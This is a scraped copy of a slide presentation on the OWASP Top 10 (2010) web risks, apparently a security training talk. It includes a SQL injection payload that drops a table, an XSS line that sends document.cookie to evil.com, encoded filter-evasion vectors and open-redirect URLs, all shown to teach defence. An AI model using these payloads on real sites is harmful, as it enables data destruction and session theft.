Download presentation
Presentation is loading. Please wait.
Published byEustace Freeman Modified over 9 years ago
1
OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources
2
OWASP The OWASP Guide
3
OWASP Threat Agent Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Business Impact ? EasyWidespreadEasySevere ? AverageCommonAverageModerate DifficultUncommonDifficultMinor
4
OWASP Warning Risk analysis Insiders Architecture Modular Clarity SDLC Knowledge Predictability
5
OWASP Top 10 - 2010 1.Injection 2.Cross site scripting (XSS) 3.Broken authentication and session management 4.Insecure direct object reference 5.Cross site request forgery (CSRF) 6.Security missconfiguration 7.Insecure cryptograpic storage 8.Failure to restrict URL access 9.Insufficient transoport layer protection 10.Unvalidated redirects and forwards
6
OWASP A1 – Injection ClientAppl DB Shell PgmCPU
7
OWASP A1 – Injection String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'"; id="foo';DROP accnts;--" SELECT * FROM accnts WHERE ID='foo';DROP accnts;--'; id="foo" SELECT * FROM accnts WHERE ID='foo';
8
OWASP A2 - Cross site scripting (XSS) Browser ApplDB
9
OWASP A2 - Cross site scripting (XSS) (String) page += " "; CC=123456789"> window.location=http://evil.com? x=document.cookie window.location=http://evil.com?x=document.cookie '> CC=“123456789"
10
OWASP A2 - Cross site scripting (XSS) < < < 000003C; \x3c \x3C \u003c \u003C < %3C < < < < < < < <img src=http://site.com onmoseover= <body onload=
11
OWASP A3 - Broken authentication and session mngmnt Unpredictable passwords, sessions-ID, security- questions No sessions-id/credentials i URL Avoid session-fixation Time out of sessions & logout buttons Different sessions id outside/inside TLS No clear text passwords
12
OWASP A4 - Insecure direct object references 2010q1 2011q2 period=2011q3 period=2011q2
13
OWASP A5 - Cross-site request forgery (CSRF)
14
OWASP A6 - Security missconfiguration Patching OS Application Frameworks / libraries Disable unnecessary services Stack traces Configuration
15
OWASP A7 - Insecure cryptographig storage Keep track on sensitive data Password one-way-hashed & salted Password/Key management TLS key pass phrase M2M lösenord (obfuscation)
16
OWASP A8 - Failure to restrict URL access /user/getAccounts /admin/getAccounts
17
OWASP A9 - Insufficient transport layer protection Use SSL/TLS No mixed content Use secure cookies Example FireSheep exploits poor solutions
18
OWASP A10 - Unvalidated redirects and forwards http://www.vuln.com/redir.asp?=http://www.lin ks.com http://www.vuln.com/redir.asp?=http://www.lin ks.com http://%77%77%77%2E%67%6F%6F%67%6C %65%2E%63%6F%6D http://%77%77%77%2E%67%6F%6F%67%6C %65%2E%63%6F%6D
19
OWASP OWASP resurser OWASP Secure Software Contract Annex OWASP Secure Software Contract Annex OWASP Developer’s Guide OWASP Developer’s Guide OWASP Enterprise Security API (ESAPI) OWASP Enterprise Security API (ESAPI) OWASP Software Assurance Maturity Model (SAMM) OWASP Software Assurance Maturity Model (SAMM) OWASP WebGoat OWASP WebGoat
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.